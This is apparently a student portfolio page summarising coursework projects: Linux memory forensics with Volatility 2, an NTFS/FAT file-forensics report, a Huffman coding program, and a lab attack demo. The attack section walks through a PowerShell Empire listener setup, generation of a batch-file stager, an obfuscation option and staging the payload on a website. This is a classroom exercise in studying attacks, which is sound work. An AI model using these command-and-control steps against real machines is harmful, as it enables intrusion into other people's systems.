
Analyzing Volatile Memory in Linux Systems

Using Volatility 2: A Forensic Approach

View in PDF

Abstract:

 

The purpose of this project is to leverage security and file-forensics tools to perform dynamic analysis of potential cybersecurity threats. We will intentionally infect a controlled PC environment with various forms of malware and analyze the resulting memory dump, and possibly files, to study the traces and signs left by the attacks. Our primary tool for this dynamic analysis will be Volatility, running in a Linux environment. The project aims to provide a comprehensive view of threat detection and defense mechanisms by studying real-world attack vectors and their impact on system memory and files.

 

Introduction:

 

As digital reliance grows, so do cyber threats, necessitating strong defense mechanisms. Memory forensics, which involves analyzing computer memory dumps, plays a crucial role in unveiling these threats.

Memory forensics offers valuable information about a system's state at the time of the memory dump, allowing investigators to track malware or attacker actions. In this project, we'll delve into memory forensics, using security and file forensic techniques to detect attacks.

We will create a controlled environment, intentionally infecting an Ubuntu virtual machine with malicious programs via the Metasploit console, and then analyze the system's memory dump and files using the Volatility framework for dynamic analysis.
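As a sketch of what that analysis could look like, the following hypothetical Volatility 2 session uses placeholder names for the dump file and profile (a custom Linux profile must first be built for the target kernel); the plugins shown are standard Volatility 2 Linux plugins:

```shell
# Hypothetical session; ubuntu.lime and the profile name are placeholders.
PROFILE=LinuxUbuntux64   # custom profile built for the victim's exact kernel
volatility -f ubuntu.lime --profile=$PROFILE linux_pslist    # list running processes
volatility -f ubuntu.lime --profile=$PROFILE linux_netstat   # open network connections
volatility -f ubuntu.lime --profile=$PROFILE linux_bash      # recover bash history
volatility -f ubuntu.lime --profile=$PROFILE linux_malfind   # scan for injected code
```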

The project demands an understanding of Linux memory and file system properties, malware-analysis research, and proficiency with security and forensic tools, as its goal is to bolster cybersecurity by analyzing the traces left by different malware types on a system's memory and files.

 

Click on the View in PDF button to read more...

 

Video demonstration:

Coming Soon!

Cyber Security Vulnerabilities: Malware

View in PDF

My Scope: Attack Demo

 

For the attack in PowerShell Empire, I typed listeners, then selected the HTTP listener with the uselistener command and pressed Enter. A menu appears with options that can be set for the listener. I set a custom port for communication, 4321; this is where the data from the agent will go. I gave the listener a custom name, csci400, so it would be easier to tell which listener I was working with. There are other listeners in my Empire instance because I did more testing before filming.

A new listener was created with the attacker's IP address (an internal IP; the victim is connected to the same router, so I do not have to set up port forwarding). Next, I selected the module I would be using by typing the command usestager windows/launcher_bat and hitting Enter.

Information about the module is displayed, such as the language used and the type and name of the file that will be generated. I can set some options, for example setting Obfuscate to True, which adds extra stealth and decreases the chance of the firewall blocking it. However, I will not do this here because I want the process to be simple and transparent for the demo.

I chose my csci400 listener for the module with the set Listener command. I did not need to set anything else, so I typed execute and hit Enter. The module executed successfully, and the file was generated. Empire writes the file into its module directory, so I moved it to another directory where I would use it with my website.
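In condensed form, the session described above looks roughly like the following; the listener name and port are the ones chosen for this demo, and the exact prompts vary between Empire versions:

```
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name csci400
(Empire: listeners/http) > set Port 4321
(Empire: listeners/http) > execute
(Empire: listeners/http) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener csci400
(Empire: stager/windows/launcher_bat) > execute
```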

 

Click on the View in PDF button to read more...

 

PowerPoint presentation preview:

Download the PowerPoints

Demo of the file encrypting program:

File Forensics on Windows 10 FAT and NTFS File Systems using The Sleuth Kit (Autopsy Wrapper)

View in PDF

Introduction

 

In this project, we will learn about file systems and malware forensics, and the process of identifying and extracting digital artifacts from a hard disk within the NTFS file system. The experiments will be done using a disk image created with the FTK Imager program in E01 format and analyzed with the help of Autopsy version 4.2, a GUI wrapper for The Sleuth Kit. The main objective of this project is to demonstrate the process of data analysis and evidence extraction using file-forensics tools, as well as to compare different file systems with a focus on NTFS. In addition, we will go over some types of malware and the artifacts they potentially leave on the victim's machine.

 

Knowledge

 

2.1 File Systems.

A file system, according to a SysDev Laboratories article (2022), is a structure defining how data is stored, organized, retrieved, and managed in a computer system. It operates on storage blocks, which are groups of sectors that allow for addressing optimization. Among a file system's tasks is bookkeeping: it logs which storage sectors are currently used and which are empty, along with file information such as size and name. The file system also manages files stored across different sectors on the disk (storage fragmentation), in addition to managing block size, file descriptors, directories, and other attributes. There are various file system types; depending on users' requirements, some may be more desirable than others. Below are some common file systems, based on information published by freeCodeCamp (Lavarian, 2022) and SysDev articles (2022):

  • New Technology File System (NTFS): the current default file system for Windows operating systems.
  • File Allocation Table (FAT): the predecessor of NTFS, used as the default file system in early Windows and MS-DOS.
  • Extended File System (EXT): widely used in Linux-based systems.
  • XFS: a Linux file system that provides great I/O performance and is therefore suitable for big-data processing in large-scale storage systems.
  • Apple File System (APFS): created by Apple for macOS, iOS, tvOS, and watchOS. The successor of HFS+, with improved performance and support for space sharing, cloning, snapshots, and encryption.
  • Hierarchical File System Plus (HFS+): the default file system of Mac OS X before APFS. Supports large file sizes, Unicode, and journaling.

These are just a few examples of file systems tailored for different operating systems. Numerous others exist. However, our analysis will concentrate on comparing the NTFS file system to its predecessor, FAT, as our investigation will be conducted using the NTFS file system.

 

2.2 Comparison of NTFS and FAT systems.

2.2.1 History of both systems.

FAT12 (King, 2023), introduced in 1977 for MS-DOS, had a 12-bit-wide file allocation table. It was succeeded by FAT16 in 1984 with MS-DOS 3.0, supporting larger hard disk sizes and a 16-bit allocation table. FAT32, launched in 1996, became the default file system in Windows 95, offering improved space utilization and file name lengths of up to 255 characters. FAT is still used for compatibility purposes in various applications and devices.

NTFS was introduced in 1993 with Windows NT 3.1 (King, 2023). It offers enhanced performance, recoverability, and security. With journaling, encryption, and permissions, it supports larger volumes and file sizes. Subsequent versions introduced compression, space-utilization improvements, distributed link tracking, disk quotas, and better scalability. NTFS 3.1, the current default for Windows operating systems, was released in 2001.

2.2.2 Main differences between the FAT and NTFS.

According to Microsoft Learn documentation for these file systems (Deland-Han, 2021) and articles from EaseUS (King, 2023), the following differences between the two systems can be observed:

  • FAT does not support journaling, making it more susceptible to data corruption.
  • NTFS supports file sizes up to 16 EiB and volume sizes up to 256 TiB, compared to FAT32's maximum file size of 4 GiB and volume size of 32 GiB.
  • NTFS supports security features like file and folder permissions, encryption, and auditing; FAT does not.
  • FAT uses a bigger cluster size, making it less efficient in disk-space utilization.
  • NTFS supports various advanced features like hard links, symbolic links, alternate data streams, and volume shadow copies; FAT does not.
  • FAT provides much more compatibility than NTFS due to its simplicity.

 

2.3 Key components of NTFS.

NTFS has a more sophisticated structure than FAT, offering various advantages and some limitations. Key components of NTFS, as described by Microsoft Learn (Microsoft, 2009), include:

  • Journaling, which maintains consistency and enables recovery from system crashes or power failures.
  • Master File Table (MFT), a database containing a record for every file and directory on the partition.
  • Compression, which saves disk space by reducing file sizes.
  • Hard links and junction points, which enable multiple file names to reference the same data or directory.
  • Partition Boot Sector, containing essential file system information.
  • Clusters and data runs, organizing disk space and storing file data.
  • Metadata files, storing critical file system information.
  • Access control and security, providing granular access control, encryption, and auditing.
  • Large file and volume support, accommodating modern storage requirements and future scalability.
  • Distributed Link Tracking (DLT), enabling applications to track linked objects across NTFS volumes.
  • Sparse files, allowing files with large empty areas that do not consume disk space.
  • Alternate Data Streams (ADS), which store additional data or metadata alongside the primary file data but can be exploited by malware to hide data or code.

 

 

Click on the View in PDF button to read more...

 

Video demonstration:

Coming Soon!

A simple Huffman Coding implementation in C++

View in PDF

Scope:

A simple program that accepts any string of text entered by the user. The output is a list of each character in the text and its Huffman code. 

 

Background:

Huffman encoding is an algorithm for lossless data compression that assigns binary codes to characters based on their frequency in the given input.

To implement Huffman encoding in C++, a heap data structure can be used. For example, a min-heap or priority queue can repeatedly merge the two nodes with the lowest frequencies until all characters are merged into a single complete tree. The greedy method starts the merging from the least frequent characters, so that the most frequent characters end up closest to the root.

 

Introduction:

The program below implements Huffman encoding in a simple way, without using any library function to get the codes. It consists of only a few classes, Node, Tree, and huffmannMethod, designed to compress a given input string by assigning a binary code to each character based on its frequency in the input, and to output the code for each character. Accuracy is tested using a decode method.

 

Methodology:

To achieve the objective of this assignment, the following steps were taken:

  • Calculate the frequency of each character.
  • Sort the characters by frequency.
  • Build a tree based on character frequency.
  • Traverse the tree and assign the Huffman codes.
  • Check accuracy with the decode method.

 

Click on the View in PDF button to read more...

Video demonstration:

Coming Soon!